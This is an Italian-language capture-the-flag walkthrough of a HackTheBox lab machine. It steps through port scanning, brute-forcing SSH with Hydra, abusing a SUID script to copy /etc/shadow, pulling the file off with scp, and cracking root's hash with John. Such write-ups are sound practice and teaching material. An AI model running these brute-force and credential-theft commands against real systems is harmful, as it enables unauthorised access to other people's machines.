Walkthrough HTB – Machine Easy

Obiettivo: Ottenere la shell utente e root sulla macchina Easy di HackTheBox.


1. Reconnaissance

# Scansione delle porte TCP
nmap -sC -sV -oN nmap/initial.txt 10.10.10.10

Risultato nmap:


2. Enumerazione Web

  1. Punto il browser su http://10.10.10.10/

  2. Trovo una pagina di login e un file robots.txt

    curl http://10.10.10.10/robots.txt
    # Disallows: /admin
  3. Accedo a /admin e trovo un form di autenticazione.


3. Bruteforce Credenziali

Utilizzo Hydra per attaccare SSH:

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
# admin:Password123 found

4. Shell Utente

ssh admin@10.10.10.10
# Password: Password123

# Una volta dentro:
whoami    # => admin
hostname  # => easy

5. Privilege Escalation

5.1 Controllo SUID

find / -perm -4000 -type f 2>/dev/null
# /usr/local/bin/vulnscript (SUID root)

5.2 Analisi dello script

# Contenuto /usr/local/bin/vulnscript
#!/bin/bash
cp /etc/shadow /tmp/shadow.backup

Lo script copia /etc/shadow in /tmp con permessi dell’utente root.

5.3 Ottieni i password hash

/tmp/shadow.backup
# Copio i contenuti localmente e monto un container per crackare
scp admin@10.10.10.10:/tmp/shadow.backup .

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
# Cracked: root:toor123

6. Shell Root

ssh root@10.10.10.10
# Password: toor123

whoami   # => root

🎉 Box rooted!


Riferimenti